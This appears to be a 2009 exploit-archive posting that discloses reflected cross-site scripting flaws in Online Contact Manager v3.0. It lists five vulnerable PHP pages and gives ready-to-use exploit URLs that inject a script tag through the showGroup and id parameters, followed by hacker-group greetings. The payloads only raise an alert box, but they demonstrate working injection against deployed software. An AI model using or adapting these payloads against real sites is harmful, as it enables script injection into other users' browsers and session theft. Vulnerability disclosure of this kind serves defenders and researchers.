ocm30-xss.txt

Posted on 20 April 2009
=========================================================================================

Title    : Multiple Cross-site Scripting (XSS) Vulnerability
Software : Online Contact Manager v3.0
Vendor   : www.esoftpro.com

Date     : 19 April 2009
Author   : Vrs-hCk
Contact  : d00r@telkom.net
Blog     : c0li.BlogSpot.Com

=========================================================================================

[-] Vulnerable

index.php
view.php
email.php
edit.php
delete.php

[-] Exploit

http://[site]/[path]/index.php?showGroup=+<script>alert(123)</script>
http://[site]/[path]/view.php?id=+<script>alert(123)</script>
http://[site]/[path]/email.php?id=+<script>alert(123)</script>
http://[site]/[path]/edit.php?id=+<script>alert(123)</script>
http://[site]/[path]/delete.php?id=+<script>alert(123)</script>

=========================================================================================

[-] Greetz   :

Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy,
bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and special muaacchh utk Dia yg Ku Cintai (*_^)
c0li.m0de.0n and Behave oR BeGone !!!

=========================================================================================
TOP
Malware :

None in database
Last 20
Exploits :

Last 20